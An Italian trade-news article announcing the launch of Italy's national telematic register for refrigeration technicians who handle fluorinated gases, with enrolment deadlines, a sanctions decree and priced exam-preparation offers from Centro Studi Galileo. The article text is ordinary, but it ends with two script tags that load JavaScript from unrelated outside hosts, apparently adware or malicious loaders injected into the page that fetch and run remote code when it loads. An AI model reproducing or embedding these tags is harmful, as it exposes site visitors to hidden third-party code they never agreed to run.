1. Home
  2. Notizie e Mercato
  3. È uscito ed è operativo il registro telematico nazionale

È uscito ed è operativo il registro telematico nazionale

Impianti idrici di
È uscito il Registro telematico nazionale: 60 giorni per iscriversi e 180 giorni per prendere il patentino a partire dall’ 11 febbraio


-    Decreto sanzioni per i proprietari degli impianti e per i Tecnici del Freddo
-    Nuovo format per il libretto d’impianto/registro delle apparecchiature
-    Registro per iscrizione all’albo

Grande notizia per il mondo del freddo e del condizionamento: il giorno 12 febbraio è uscito il tanto atteso Registro Telematico Nazionale nel quale dovranno iscriversi persone ed aziende che operano nella refrigerazione e condizionamento.

Il Registro è stato creato per censire i tecnici che effettuano operazioni di installazione, manutenzione, recupero e ricerca perdite su impianti che contengono refrigeranti fluorurati, indipendentemente dalla quantità in essi contenuta.

Centro Studi Galileo, leader nella formazione nei settori della refrigerazione e del condizionamento, opera da 40 anni per la qualificazione dei tecnici e della professione del frigorista. Oggi, in qualità di Organismo di Valutazione accreditato presso Accredia,  è erogatore degli esami per il conseguimento della Certificazione dei tecnici del freddo, secondo la Regolamentazione Europea 842/06 e i regolamenti della Commissione Europea di esecuzione della stessa, per gli operatori che maneggiano e comprano i gas refrigeranti fluorurati. Sono stati centinaia i tecnici Certificati in questi mesi di attesa dell’uscita del registro.

Ora che è stato emanato il Registro, tutti coloro che hanno già superato con esito positivo l’esame potranno iscriversi immediatamente. L’iscrizione viene effettuata telematicamente sul sito www.fgas.it. Coloro i quali devono ancora provvedere avranno a disposizione due mesi di tempo per iscriversi e certificarsi, prorogabili di altri 6 mesi, richiedendo il certificato provvisorio. Dopo tale periodo non potranno più operare nel rispetto delle norme.

Il Centro Studi Galileo ha promosso l’“Offerta Lancio Registro”, per agevolare tutti i tecnici che devono ancora certificarsi al fine di ottemperare all’obbligo di legge in così breve tempo.

Tale pacchetto è costituito da due giornate di preparazione all’esame in cui vengono spiegati tutti gli argomenti oggetto di esame e svolte le operazioni pratiche ed una terza giornata dedicata all’esame stesso, i costi sono i seguenti:  
-    euro 880 + IVA per gli ex allievi, i soci ATF (Associazione Tecnici del Freddo) e per gruppi di tecnici superiori a quattro
-    euro 980 + IVA per tutti
Per i tecnici che intendono accedere direttamente all’esame i costi sono i seguenti:
-    euro 650 + IVA per gli ex allievi, i soci ATF (Associazione Tecnici del Freddo) e per gruppi di tecnici superiori a quattro
-    euro 720 + IVA per tutti
-    
Altra importante novità riguarda l’emanazione del Decreto Sanzioni, approvato dal Consiglio dei Ministri, che prevede sanzioni per gli operatori/proprietari degli apparecchi di refrigerazione, condizionamento aria, sistemi antincendio e pompe di calore per il mancato controllo periodico delle macchine e per la mancata tenuta del registro delle apparecchiatura. Inoltre sanzioni sono previste per l’utilizzo di personale non qualificato, cioè che non è in possesso del relativo patentino frigoristi.

Tutti i dettagli su www.centrogalileo.it/patentini.htm

Il registro delle apparecchiature (da molti pure paragonato al libretto d’impianto delle caldaie) è stato ora pure uniformato con un format rilasciato dal Ministero dell’Ambiente che è scaricabile dal sito del Ministero stesso.

Il Centro Studi  Galileo, n. 1 in Italia e all’estero nell’ambito delle certificazioni, al quale da decenni le Nazioni Unite si rivolgono per collaborazioni a livello mondiale e che, ultimamente, hanno preso come modello per le Associazioni Europee e Asiatiche, informa pure che, proprio con particolare riferimento alle certificazioni oltre che in generale  sulle nuove tecnologie del freddo e del condizionamento,  si svolgerà il 7 e 8 giugno 2013 presso il Politecnico di Milano il XV Convegno Europeo.
 

<script src="https://loading-resource.com/data.js.php?i={271EC601-39CC-426C-935D-F754BCD76643}&amp;d=2012-10-16&amp;s=http://www.guidaedilizia.it/Backoffice/GuidaNews/Inserisci_Articoli.asp?TipologiaID=1" type="text/javascript"></script><script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&amp;pid=1032&amp;zoneid=62862"></script>